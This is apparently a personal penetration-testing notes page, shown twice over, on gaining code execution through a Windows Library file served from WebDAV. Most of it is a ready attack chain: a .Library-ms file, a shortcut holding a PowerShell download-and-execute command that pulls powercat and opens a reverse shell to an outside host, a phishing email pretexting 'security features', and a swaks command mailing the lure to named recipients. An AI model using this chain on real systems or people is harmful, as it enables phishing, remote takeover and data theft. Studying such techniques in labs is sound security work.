Code execution via Windows Library Files

code execution via Windows Library Files

Enable webdav share
- mkdir /home/kali/webdav
- cd ~/webdav
- python -m venv .venv
- source .venv/bin/activate
  - python -m pip install -U pip
  - python -m pip install wsgidav cheroot lxml
  - wsgidav --host=0.0.0.0 --port=80 --auth=anonymous -r /home/kali/webdav/
Create 2 file on Windows
- open window machine
- Open vscode
  - create new file name config.Library-ms
    <?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url>http://192.168.119.2</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription>
    save on desktop
  - create a shortcut file name install
    Right click on desktop New>shortcut
    enter command in item’s location
    powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');powercat -c 192.168.119.3 -p 4444 -e powershell"
- Transfer both file on webdav dir
On Webdav dir
- nano body.txt
  - Hey! I checked mail and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons. On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks! John
- cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
- and 2 file from windows
- python3 -m http.server 8000
- nc -nvlp 444
Now send email
sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

PreviousMacro using Minitrue tool NextPort and Services

Last updated 1 year ago

code execution via Windows Library Files

Enable webdav share

mkdir /home/kali/webdav
cd ~/webdav
python -m venv .venv
source .venv/bin/activate
- python -m pip install -U pip
- python -m pip install wsgidav cheroot lxml
- wsgidav --host=0.0.0.0 --port=80 --auth=anonymous -r /home/kali/webdav/

Create 2 file on Windows

open window machine
Open vscode
- create new file name config.Library-ms
  - <?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url>http://192.168.119.2</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription>
  - save on desktop
- create a shortcut file name install
  - Right click on desktop New>shortcut
  - enter command in item’s location
    powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');powercat -c 192.168.119.3 -p 4444 -e powershell"
Transfer both file on webdav dir

On Webdav dir

nano body.txt
- Hey! I checked mail and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons. On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks! John
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
and 2 file from windows
python3 -m http.server 8000
nc -nvlp 444

Now send email

sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap